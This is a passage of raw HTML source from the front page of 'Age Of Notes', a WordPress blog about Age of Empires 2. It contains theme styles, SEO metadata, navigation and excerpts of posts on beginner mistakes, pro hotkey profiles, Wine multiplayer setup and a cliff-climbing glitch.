4.467,4.467,0,0,1-1.021,1.8,4.559,4.559,0,0,1-1.512,1.417.671.671,0,0,1-.7-.078q-.156-.112-2.052-3.2l-.524-.859a.761.761,0,0,1-.128-.513.957.957,0,0,1,.217-.513.774.774,0,0,1,.926-.29q.011.011,1.327.446,2.264.736,2.7.887a2.082,2.082,0,0,1,.524.229.673.673,0,0,1,.245.68Zm-7.5-7.049q.056,1.137-.6,1.361-.647.19-1.272-.792L6.237,4.08a.7.7,0,0,1,.212-.691,5.788,5.788,0,0,1,2.314-1,5.928,5.928,0,0,1,2.5-.352.681.681,0,0,1,.547.5q.034.2.245,3.407T12.327,10.181Zm7.384,1.2a.679.679,0,0,1-.29.658q-.167.112-3.67.959-.747.167-1.015.257l.011-.022a.769.769,0,0,1-.513-.044.914.914,0,0,1-.413-.357.786.786,0,0,1,0-.971q.011-.011.836-1.137,1.394-1.908,1.673-2.275a2.423,2.423,0,0,1,.379-.435A.7.7,0,0,1,17.435,8a4.482,4.482,0,0,1,1.372,1.489,4.81,4.81,0,0,1,.9,1.868v.034Z"/> </symbol> <symbol id="icon-youtube" viewBox="0 0 24 24"> <path d="M21.8,8.001c0,0-0.195-1.378-0.795-1.985c-0.76-0.797-1.613-0.801-2.004-0.847c-2.799-0.202-6.997-0.202-6.997-0.202 h-0.009c0,0-4.198,0-6.997,0.202C4.608,5.216,3.756,5.22,2.995,6.016C2.395,6.623,2.2,8.001,2.2,8.001S2,9.62,2,11.238v1.517 c0,1.618,0.2,3.237,0.2,3.237s0.195,1.378,0.795,1.985c0.761,0.797,1.76,0.771,2.205,0.855c1.6,0.153,6.8,0.201,6.8,0.201 s4.203-0.006,7.001-0.209c0.391-0.047,1.243-0.051,2.004-0.847c0.6-0.607,0.795-1.985,0.795-1.985s0.2-1.618,0.2-3.237v-1.517 C22,9.62,21.8,8.001,21.8,8.001z M9.935,14.594l-0.001-5.62l5.404,2.82L9.935,14.594z"/> </symbol> </defs> </svg> </body> </html> <!-- generated in 0.422 seconds 101415 bytes batcached for 300 seconds -->
0
<!DOCTYPE html> <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <head itemscope itemtype="http://schema.org/WebSite"><link rel="preload" href="//fonts.googleapis.com/css?family=Noto+Serif%3A400%2C400i%2C700%2C700i" as="style" onload="this.rel='stylesheet'" /> <meta charset="UTF-8"> <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame --> <!--[if IE ]> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <![endif]--> <link rel="profile" href="https://gmpg.org/xfn/11" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta itemprop="name" content="Age Of Notes" /> <meta itemprop="url" content="https://ageofnotes.com" /> <link rel="pingback" href="https://ageofnotes.com/xmlrpc.php" /> <title>Age Of Notes - Learn and Play Age Of Empires 2 Just Better</title> <style type="text/css"> /** * GeSHi Dynamically Generated Stylesheet * -------------------------------------- * Dynamically generated stylesheet for bash * CSS class: , CSS id: * GeSHi (C) 2004 - 2007 Nigel McNie, 2007 - 2014 Benny Baumann * (http://qbnz.com/highlighter/ and http://geshi.org/) * -------------------------------------- */ .bash .de1, .bash .de2 {} .bash {font-family:monospace;} .bash .imp {font-weight: bold; color: red;} .bash li, .bash .li1 {font-weight: normal; vertical-align:top;} .bash .ln {width:1px;text-align:right;margin:0;padding:0 2px;vertical-align:top;} .bash .li2 {font-weight: bold; vertical-align:top;} .bash .kw1 {color: #000000; font-weight: bold;} .bash .kw2 {color: #c20cb9; font-weight: bold;} .bash .kw3 {color: #7a0874; font-weight: bold;} .bash .co0 {color: #666666; font-style: italic;} .bash .co1 {color: #800000;} .bash .co2 {color: #cc0000; font-style: italic;} .bash .co3 {color: #000000; font-weight: bold;} .bash .co4 {color: #666666;} .bash .es1 {color: #000099; font-weight: bold;} .bash .es2 {color: #007800;} .bash .es3 {color: #007800;} .bash .es4 {color: #007800;} .bash .es5 {color: #780078;} .bash .es_h {color: #000099; font-weight: bold;} .bash .br0 {color: #7a0874; font-weight: bold;} .bash .sy0 {color: #000000; font-weight: bold;} .bash .st0 {color: #ff0000;} .bash .st_h {color: #ff0000;} .bash .nu0 {color: #000000;} .bash .re0 {color: #007800;} .bash .re1 {color: #007800;} .bash .re2 {color: #007800;} .bash .re4 {color: #007800;} .bash .re5 {color: #660033;} .bash .ln-xtra, .bash li.ln-xtra, .bash div.ln-xtra {background-color: #ffc;} .bash span.xtra { display:block; } </style> <style id="rocket-critical-css"></style><script type="text/javascript">document.documentElement.className = document.documentElement.className.replace( /\bno-js\b/,'js' );</script> <!-- This site is optimized with the Yoast SEO plugin v11.0 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="If you want to learn about Age of Empires 2 over the shoulder of an established expert this blog is for you. Tutorials, Guides, Build Orders ..."/> <link rel="canonical" href="https://ageofnotes.com/" /> <link rel="next" href="https://ageofnotes.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Age Of Notes - Learn and Play Age Of Empires 2 Just Better" /> <meta property="og:description" content="If you want to learn about Age of Empires 2 over the shoulder of an established expert this blog is for you. Tutorials, Guides, Build Orders ..." /> <meta property="og:url" content="https://ageofnotes.com/" /> <meta property="og:site_name" content="Age Of Notes" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="If you want to learn about Age of Empires 2 over the shoulder of an established expert this blog is for you. Tutorials, Guides, Build Orders ..." /> <meta name="twitter:title" content="Age Of Notes - Learn and Play Age Of Empires 2 Just Better" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://ageofnotes.com/#website","url":"https://ageofnotes.com/","name":"Age Of Notes","publisher":{"@id":"https://ageofnotes.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://ageofnotes.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://ageofnotes.com/#webpage","url":"https://ageofnotes.com/","inLanguage":"en-US","name":"Age Of Notes - Learn and Play Age Of Empires 2 Just Better","isPartOf":{"@id":"https://ageofnotes.com/#website"},"about":{"@id":"https://ageofnotes.com/#organization"},"description":"If you want to learn about Age of Empires 2 over the shoulder of an established expert this blog is for you. Tutorials, Guides, Build Orders ..."}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Age Of Notes &raquo; Feed" href="https://ageofnotes.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Age Of Notes &raquo; Comments Feed" href="https://ageofnotes.com/comments/feed/" /> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='preload' id='wp-block-library-css' href='https://ageofnotes.com/wp-includes/css/dist/block-library/style.min.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='wp-components-css' href='https://ageofnotes.com/wp-includes/css/dist/components/style.min.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='wp-block-editor-css' href='https://ageofnotes.com/wp-includes/css/dist/block-editor/style.min.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='wp-nux-css' href='https://ageofnotes.com/wp-includes/css/dist/nux/style.min.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='wp-editor-css' href='https://ageofnotes.com/wp-includes/css/dist/editor/style.min.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='sld_block-cgb-style-css-css' href='https://ageofnotes.com/wp-content/plugins/simple-link-directory/gutenberg/sld-block/dist/blocks.style.build.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='contact-form-7-css' href='https://ageofnotes.com/wp-content/plugins/contact-form-7/includes/css/styles.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='tp-twitch-style-css' href='https://ageofnotes.com/wp-content/plugins/tomparisde-twitchtv-widget/public/css/styles.min.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='wp-polls-css' href='https://ageofnotes.com/wp-content/plugins/wp-polls/polls-css.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <style id='wp-polls-inline-css' type='text/css'> .wp-polls .pollbar { margin: 1px; font-size: 6px; line-height: 8px; height: 8px; background-image: url('https://ageofnotes.com/wp-content/plugins/wp-polls/images/default/pollbg.gif'); border: 1px solid #c8c8c8; } </style> <link rel='preload' id='wpgeshi-wp-geshi-highlight-css' href='https://ageofnotes.com/wp-content/plugins/wp-geshi-highlight/wp-geshi-highlight.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='authority-stylesheet-css' href='https://ageofnotes.com/wp-content/themes/agetips/style.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <style id='authority-stylesheet-inline-css' type='text/css'> #move-to-top, .tagcloud a, .latestPost-review-wrapper, .latestPost .review-type-circle.latestPost-review-wrapper, .latestPost .review-type-circle.wp-review-on-thumbnail, #wpmm-megamenu .review-total-only, .ball-pulse > div, .post-password-form input[type='submit'], #commentform input#submit, .contact-form input[type='submit'], .pace .pace-progress, .woocommerce a.button, .woocommerce-page a.button, .woocommerce button.button, .woocommerce-page button.button, .woocommerce input.button, .woocommerce-page input.button, .woocommerce #respond input#submit, .woocommerce-page #respond input#submit, .woocommerce #content input.button, .woocommerce-page #content input.button, .woocommerce .bypostauthor:after, #searchsubmit, .woocommerce nav.woocommerce-pagination ul li a:focus, .woocommerce-page nav.woocommerce-pagination ul li a:focus, .woocommerce #content nav.woocommerce-pagination ul li a:focus, .woocommerce-page #content nav.woocommerce-pagination ul li a:focus, .woocommerce a.button, .woocommerce-page a.button, .woocommerce button.button, .woocommerce-page button.button, .woocommerce input.button, .woocommerce-page input.button, .woocommerce #respond input#submit, .woocommerce-page #respond input#submit, .woocommerce #content input.button, .woocommerce-page #content input.button, .woocommerce-product-search input[type='submit'] {background: #ef007c; color: #fff; } .woocommerce-product-search input[type='submit'], .post-password-form input[type='submit'], #commentform input#submit, .contact-form input[type='submit'], input[type='submit'] {border-color: #ef007c; } a, a:hover, .latestPost .title a:hover, .widget li a:hover, .comment-meta a, .fn a:hover, #primary-navigation .sub-menu a:hover, .page-numbers.current, .woocommerce nav.woocommerce-pagination ul li span, .woocommerce-page nav.woocommerce-pagination ul li span, .woocommerce #content nav.woocommerce-pagination ul li span, .woocommerce-page #content nav.woocommerce-pagination ul li span, .woocommerce nav.woocommerce-pagination ul li span.current, .woocommerce-page nav.woocommerce-pagination ul li span.current, .woocommerce #content nav.woocommerce-pagination ul li span.current, .woocommerce-page #content nav.woocommerce-pagination ul li span.current, .woocommerce nav.woocommerce-pagination ul li a:hover, .woocommerce-page nav.woocommerce-pagination ul li a:hover, .woocommerce #content nav.woocommerce-pagination ul li a:hover, .woocommerce-page #content nav.woocommerce-pagination ul li a:hover {color: #ef007c; } .upper-navigation, .post-info, .sidebar .mts_author_intro_widget .widget-title { background: #00A9E0; } .sidebar .mts_author_intro_widget .mts-author-intro { border-bottom-color: #00A9E0; } body {background: #ffffff;background: -moz-linear-gradient(top, #e2e0e0 0%, #f7f6f6 100%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#e2e0e0), color-stop(100%,#f7f6f6));background: -webkit-linear-gradient(top, #e2e0e0 0%,#f7f6f6 100%);background: -o-linear-gradient(top, #e2e0e0 0%,#f7f6f6 100%);background: -ms-linear-gradient(top, #e2e0e0 0%,#f7f6f6 100%);background: linear-gradient(to bottom, #e2e0e0 0%,#f7f6f6 100%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#e2e0e0', endColorstr='#f7f6f6',GradientType=0 );} #header {background: #000000;background: -moz-linear-gradient(top, #292929 0%, #8224e3 100%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#292929), color-stop(100%,#8224e3));background: -webkit-linear-gradient(top, #292929 0%,#8224e3 100%);background: -o-linear-gradient(top, #292929 0%,#8224e3 100%);background: -ms-linear-gradient(top, #292929 0%,#8224e3 100%);background: linear-gradient(to bottom, #292929 0%,#8224e3 100%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#292929', endColorstr='#8224e3',GradientType=0 );} .navigation-wrap {background: #F3F3F3;background: -moz-linear-gradient(top, #F3F3F3 0%, #E1E1E1 100%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#F3F3F3), color-stop(100%,#E1E1E1));background: -webkit-linear-gradient(top, #F3F3F3 0%,#E1E1E1 100%);background: -o-linear-gradient(top, #F3F3F3 0%,#E1E1E1 100%);background: -ms-linear-gradient(top, #F3F3F3 0%,#E1E1E1 100%);background: linear-gradient(to bottom, #F3F3F3 0%,#E1E1E1 100%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#F3F3F3', endColorstr='#E1E1E1',GradientType=0 );} #site-footer {background: #EFEFEF;background: -moz-linear-gradient(top, #EFEFEF 0%, #E4E4E4 100%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#EFEFEF), color-stop(100%,#E4E4E4));background: -webkit-linear-gradient(top, #EFEFEF 0%,#E4E4E4 100%);background: -o-linear-gradient(top, #EFEFEF 0%,#E4E4E4 100%);background: -ms-linear-gradient(top, #EFEFEF 0%,#E4E4E4 100%);background: linear-gradient(to bottom, #EFEFEF 0%,#E4E4E4 100%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#EFEFEF', endColorstr='#E4E4E4',GradientType=0 );} .bypostauthor { background: #FAFAFA; } .bypostauthor:after { content: "Author"; position: absolute; right: -1px; bottom: -1px; padding: 1px 10px; background: #818181; color: #FFF; } .lower-navigation .container{ height: 101px; } .post-content a:link, a:visited, a:active { text-decoration: underline; box-shadow: inset 0 -2px 0 #ed0087; } .post-content a:hover { text-decoration:none;box-shadow: none; } .avatar { border-radius: 50%; -moz-border-radius: 50%; -webkit-border-radius: 50%; } pre { background: #fff; } </style> <link rel='preload' id='magnificPopup-css' href='https://ageofnotes.com/wp-content/themes/agetips/css/magnific-popup.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='fontawesome-css' href='https://ageofnotes.com/wp-content/themes/agetips/css/font-awesome.min.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <link rel='preload' id='responsive-css' href='https://ageofnotes.com/wp-content/themes/agetips/css/responsive.css' as="style" onload="this.rel='stylesheet'" type='text/css' media='all' /> <script type='text/javascript' src='https://ageofnotes.com/wp-content/cache/min/1/61e2961d4c9eb3f87cabc58f4089864e.js' data-minify="1"></script> <script type='text/javascript' src='https://ageofnotes.com/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var mts_customscript = {"responsive":"1","nav_menu":"primary"}; /* ]]> */ </script> <script type='text/javascript' async="async" src='https://ageofnotes.com/wp-content/cache/min/1/c0299bd341cbbfe76ddf438ba463df92.js' data-minify="1"></script> <link rel='https://api.w.org/' href='https://ageofnotes.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://ageofnotes.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://ageofnotes.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <script type="text/javascript"> var ajaxurl = "https://ageofnotes.com/wp-admin/admin-ajax.php"; </script><script type="text/javascript"> var ajaxurl = "https://ageofnotes.com/wp-admin/admin-ajax.php"; </script> <style type="text/css"> #header h1, #header h2 { font-family: Helvetica, Arial, sans-serif; font-weight: 700; font-size: 34px; color: #ef007c; } .site-description { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 15px; color: #00a9e0; } #primary-navigation a { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 13px; color: #333333; } .latestPost .title a { font-family: Helvetica, Arial, sans-serif; font-weight: 700; font-size: 30px; color: #222222; } .single-title { font-family: Helvetica, Arial, sans-serif; font-weight: 700; font-size: 30px; color: #222222; } body { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 15px; color: #000000; } .sidebar .widget h3 { font-family: Helvetica, Arial, sans-serif; font-weight: 700; font-size: 20px; color: #00a9e0; } #sidebar .widget { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 15px; color: #444444; } #site-footer .widget h3 { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 20px; color: #00a9e0; } #site-footer { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 15px; color: #000000; } #copyright-note { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 12px; color: #5f5f5f; } h1 { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 28px; color: #00a9e0; } h2 { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 24px; color: #00a9e0; } h3 { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 22px; color: #00a9e0; } h4 { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 20px; color: #00a9e0; } h5 { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 18px; color: #00a9e0; } h6 { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 16px; color: #00a9e0; } </style> <meta name="msvalidate.01" content="381CE04DB17BDB12AC31680FCCB25AAA" /> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-0608818284340124", enable_page_level_ads: true }); </script><script> /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */ !function(a){"use strict";var b=function(b,c,d){function e(a){return h.body?a():void setTimeout(function(){e(a)})}function f(){i.addEventListener&&i.removeEventListener("load",f),i.media=d||"all"}var g,h=a.document,i=h.createElement("link");if(c)g=c;else{var j=(h.body||h.getElementsByTagName("head")[0]).childNodes;g=j[j.length-1]}var k=h.styleSheets;i.rel="stylesheet",i.href=b,i.media="only x",e(function(){g.parentNode.insertBefore(i,c?g:g.nextSibling)});var l=function(a){for(var b=i.href,c=k.length;c--;)if(k[c].href===b)return a();setTimeout(function(){l(a)})};return i.addEventListener&&i.addEventListener("load",f),i.onloadcssdefined=l,l(f),i};"undefined"!=typeof exports?exports.loadCSS=b:a.loadCSS=b}("undefined"!=typeof global?global:this); /*! loadCSS rel=preload polyfill. [c]2017 Filament Group, Inc. MIT License */ !function(a){if(a.loadCSS){var b=loadCSS.relpreload={};if(b.support=function(){try{return a.document.createElement("link").relList.supports("preload")}catch(b){return!1}},b.poly=function(){for(var b=a.document.getElementsByTagName("link"),c=0;c<b.length;c++){var d=b[c];"preload"===d.rel&&"style"===d.getAttribute("as")&&(a.loadCSS(d.href,d,d.getAttribute("media")),d.rel=null)}},!b.support()){b.poly();var c=a.setInterval(b.poly,300);a.addEventListener&&a.addEventListener("load",function(){b.poly(),a.clearInterval(c)}),a.attachEvent&&a.attachEvent("onload",function(){a.clearInterval(c)})}}}(this); </script><script data-no-minify="1" data-cfasync="false">(function(w,d){function a(){var b=d.createElement("script");b.async=!0;b.src="https://ageofnotes.com/wp-content/plugins/wp-rocket/inc/front/js/lazyload.1.0.5.min.js";var a=d.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a)}w.attachEvent?w.attachEvent("onload",a):w.addEventListener("load",a,!1)})(window,document);</script></head> <body id="blog" class="home blog main" itemscope itemtype="http://schema.org/WebPage"> <div class="main-container"> <header id="site-header" role="banner" itemscope itemtype="http://schema.org/WPHeader"> <div id="header"> <div class="upper-navigation"> <div class="container clearfix"> <div class="header-social"> <a target="_blank" href="https://www.facebook.com/Age-of-Notes-1526015334160629/">Facebook</a> <a target="_blank" href="#">Twitter</a> <a target="_blank" href="#">Google+</a> </div> </div> </div> <div class="lower-navigation"> <div class="container clearfix"> <div class="logo-wrap"> <h1 id="logo" class="image-logo" itemprop="headline"> <a href="https://ageofnotes.com"><img src="https://ageofnotes.com/wp-content/uploads/2017/11/ageofnotes2.png" alt="Age Of Notes" width="397" height="120"></a> </h1><!-- END #logo --> </div> <div id="search-6" class="widget widget_search"> <form method="get" id="searchform" class="search-form" action="https://ageofnotes.com" _lpchecked="1"> <fieldset> <input type="text" name="s" id="s" value="" placeholder="Search the site" /> <button id="search-image" class="sbutton" type="submit" value=""> <i class="fa fa-search"></i> </button> </fieldset> </form> </div><!-- END #search-6 --> </div> </div> </div> <div class="navigation-wrap"> <div class="container clearfix"> <div id="primary-navigation" role="navigation" itemscope itemtype="http://schema.org/SiteNavigationElement"> <a href="#" id="pull" class="toggle-mobile-menu">Menu</a> <nav class="navigation clearfix"> <ul id="menu-head" class="menu clearfix"><li id="menu-item-200" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-200"><a href="http://ageofnotes.com">Home</a></li> <li id="menu-item-201" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-201"><a href="https://ageofnotes.com/category/beginners/">Beginners</a></li> <li id="menu-item-202" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-202"><a href="https://ageofnotes.com/category/tutorials/">Tutorials</a></li> <li id="menu-item-203" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-203"><a href="https://ageofnotes.com/category/strategies/">Strategies</a></li> <li id="menu-item-204" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-204"><a href="https://ageofnotes.com/category/resolve-issues/">Resolve Issues</a></li> <li id="menu-item-379" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-379"><a href="https://ageofnotes.com/resources/">Resources</a></li> <li id="menu-item-205" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-205"><a href="https://ageofnotes.com/contact-us/">Contact</a></li> </ul> </nav> <nav class="navigation mobile-only clearfix mobile-menu-wrapper"> <ul id="menu-head-1" class="menu clearfix"><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-200"><a href="http://ageofnotes.com">Home</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-201"><a href="https://ageofnotes.com/category/beginners/">Beginners</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-202"><a href="https://ageofnotes.com/category/tutorials/">Tutorials</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-203"><a href="https://ageofnotes.com/category/strategies/">Strategies</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-204"><a href="https://ageofnotes.com/category/resolve-issues/">Resolve Issues</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-379"><a href="https://ageofnotes.com/resources/">Resources</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-205"><a href="https://ageofnotes.com/contact-us/">Contact</a></li> </ul> </nav> </div> </div> </div> </header> <div id="page"> <div class="article"> <div id="content_box"> <article class="latestPost excerpt index-2"> <header> <h2 class="title front-view-title" itemprop="headline"><a href="https://ageofnotes.com/beginners/5-reasons-why-you-keep-losing-in-age-of-empires-2/" title="5 Reasons Why You Keep Losing In Age of Empires 2">5 Reasons Why You Keep Losing In Age of Empires 2</a></h2> <div class="post-info"> <span class="theauthor"><i class="fa fa-check"></i> <span><a href="https://ageofnotes.com/author/gregstein/" title="Posts by GregStein" rel="author">GregStein</a></span></span> <span class="thetime date updated"><i class="fa fa-clock-o"></i> <span>April 24, 2019</span></span> <span class="thecategory"><i class="fa fa-tags"></i> <a href="https://ageofnotes.com/category/beginners/" title="View all posts in Beginners">Beginners</a></span> <span class="thecomment"><i class="fa fa-comments"></i> <a href="https://ageofnotes.com/beginners/5-reasons-why-you-keep-losing-in-age-of-empires-2/#respond" itemprop="interactionCount">No Comments</a></span> </div> </header> <a href="https://ageofnotes.com/beginners/5-reasons-why-you-keep-losing-in-age-of-empires-2/" title="5 Reasons Why You Keep Losing In Age of Empires 2" class="post-image post-image-left"> <div class="featured-thumbnail"><img width="622" height="320" src="https://ageofnotes.com/wp-content/uploads/2019/04/5-Reasons-Why-You-Keep-Losing-In-Age-of-Empires-2-1-622x320.jpg" class="attachment-authority-featuredfull size-authority-featuredfull wp-post-image" alt="5 Reasons Why You Keep Losing In Age of Empires 2" title="" /></div> </a> <div class="front-view-content"> How many times have you asked yourself – Why am I so bad at this game? – What to do to beat this guy? –What am I doing wrong?&nbsp;&hellip; </div> <div class="article-footer"> <span class="thecomment"><span class="thenumber">0</span> <a href="https://ageofnotes.com/beginners/5-reasons-why-you-keep-losing-in-age-of-empires-2/#respond" itemprop="interactionCount">Comments</a></span> <span class="leave-reply"><a href="https://ageofnotes.com/beginners/5-reasons-why-you-keep-losing-in-age-of-empires-2/#respond">Leave Your Response</a></span> </div> </article> <article class="latestPost excerpt index-2"> <header> <h2 class="title front-view-title" itemprop="headline"><a href="https://ageofnotes.com/tutorials/how-to-install-hotkey-profiles-from-pro-players/" title="How to Install Hotkey Profiles from Pro Players">How to Install Hotkey Profiles from Pro Players</a></h2> <div class="post-info"> <span class="theauthor"><i class="fa fa-check"></i> <span><a href="https://ageofnotes.com/author/gregstein/" title="Posts by GregStein" rel="author">GregStein</a></span></span> <span class="thetime date updated"><i class="fa fa-clock-o"></i> <span>April 24, 2019</span></span> <span class="thecategory"><i class="fa fa-tags"></i> <a href="https://ageofnotes.com/category/tutorials/" title="View all posts in Tutorials">Tutorials</a></span> <span class="thecomment"><i class="fa fa-comments"></i> <a href="https://ageofnotes.com/tutorials/how-to-install-hotkey-profiles-from-pro-players/#respond" itemprop="interactionCount">No Comments</a></span> </div> </header> <a href="https://ageofnotes.com/tutorials/how-to-install-hotkey-profiles-from-pro-players/" title="How to Install Hotkey Profiles from Pro Players" class="post-image post-image-left"> <div class="featured-thumbnail"><img width="622" height="320" src="https://ageofnotes.com/wp-content/uploads/2019/04/hotkeys_setup_aoe2-1-622x320.jpg" class="attachment-authority-featuredfull size-authority-featuredfull wp-post-image" alt="" title="" /></div> </a> <div class="front-view-content"> Interested in using hotkey profiles from professional players such as TheViper, Tatoh, Riut, Cloud, St4rk, Spring etc.? I have compiled hotkey profiles for 6 pro players for you to&nbsp;&hellip; </div> <div class="article-footer"> <span class="thecomment"><span class="thenumber">0</span> <a href="https://ageofnotes.com/tutorials/how-to-install-hotkey-profiles-from-pro-players/#respond" itemprop="interactionCount">Comments</a></span> <span class="leave-reply"><a href="https://ageofnotes.com/tutorials/how-to-install-hotkey-profiles-from-pro-players/#respond">Leave Your Response</a></span> </div> </article> <article class="latestPost excerpt index-2 last"> <header> <h2 class="title front-view-title" itemprop="headline"><a href="https://ageofnotes.com/tutorials/setting-age-empires-2-multiplayer-wine-linux-2019/" title="Setting up Age of Empires 2 Multiplayer For Wine Linux 2019">Setting up Age of Empires 2 Multiplayer For Wine Linux 2019</a></h2> <div class="post-info"> <span class="theauthor"><i class="fa fa-check"></i> <span><a href="https://ageofnotes.com/author/gregstein/" title="Posts by GregStein" rel="author">GregStein</a></span></span> <span class="thetime date updated"><i class="fa fa-clock-o"></i> <span>March 30, 2019</span></span> <span class="thecategory"><i class="fa fa-tags"></i> <a href="https://ageofnotes.com/category/tutorials/" title="View all posts in Tutorials">Tutorials</a></span> <span class="thecomment"><i class="fa fa-comments"></i> <a href="https://ageofnotes.com/tutorials/setting-age-empires-2-multiplayer-wine-linux-2019/#comments" itemprop="interactionCount">19 Comments</a></span> </div> </header> <a href="https://ageofnotes.com/tutorials/setting-age-empires-2-multiplayer-wine-linux-2019/" title="Setting up Age of Empires 2 Multiplayer For Wine Linux 2019" class="post-image post-image-left"> <div class="featured-thumbnail"><img width="622" height="320" src="https://ageofnotes.com/wp-content/uploads/2019/03/SettingupVooblyinwine-622x320.png" class="attachment-authority-featuredfull size-authority-featuredfull wp-post-image" alt="" title="" /></div> </a> <div class="front-view-content"> SHH&#8230; HAA&#8230; AoE2ToolsCloud has been released just today&#8230;Hooray! Q: What&#8217;s AoE2ToolsCloud? A: AoE2ToolsCloud Sets up Voobly and Age of Empires 2 for multiplayer in OneClick. You no longer have&nbsp;&hellip; </div> <div class="article-footer"> <span class="thecomment"><span class="thenumber">19</span> <a href="https://ageofnotes.com/tutorials/setting-age-empires-2-multiplayer-wine-linux-2019/#comments" itemprop="interactionCount">Comments</a></span> <span class="leave-reply"><a href="https://ageofnotes.com/tutorials/setting-age-empires-2-multiplayer-wine-linux-2019/#comments">Leave Your Response</a></span> </div> </article> <article class="latestPost excerpt index-2"> <header> <h2 class="title front-view-title" itemprop="headline"><a href="https://ageofnotes.com/resolve-issues/glitch-let-climb-cliffs-age-empires-2-video-proof/" title="A Glitch Let You Climb Cliffs in Age of Empires 2 With A Video Proof">A Glitch Let You Climb Cliffs in Age of Empires 2 With A Video Proof</a></h2> <div class="post-info"> <span class="theauthor"><i class="fa fa-check"></i> <span><a href="https://ageofnotes.com/author/gregstein/" title="Posts by GregStein" rel="author">GregStein</a></span></span> <span class="thetime date updated"><i class="fa fa-clock-o"></i> <span>October 30, 2018</span></span> <span class="thecategory"><i class="fa fa-tags"></i> <a href="https://ageofnotes.com/category/resolve-issues/" title="View all posts in Resolve Issues">Resolve Issues</a></span> <span class="thecomment"><i class="fa fa-comments"></i> <a href="https://ageofnotes.com/resolve-issues/glitch-let-climb-cliffs-age-empires-2-video-proof/#respond" itemprop="interactionCount">No Comments</a></span> </div> </header> <a 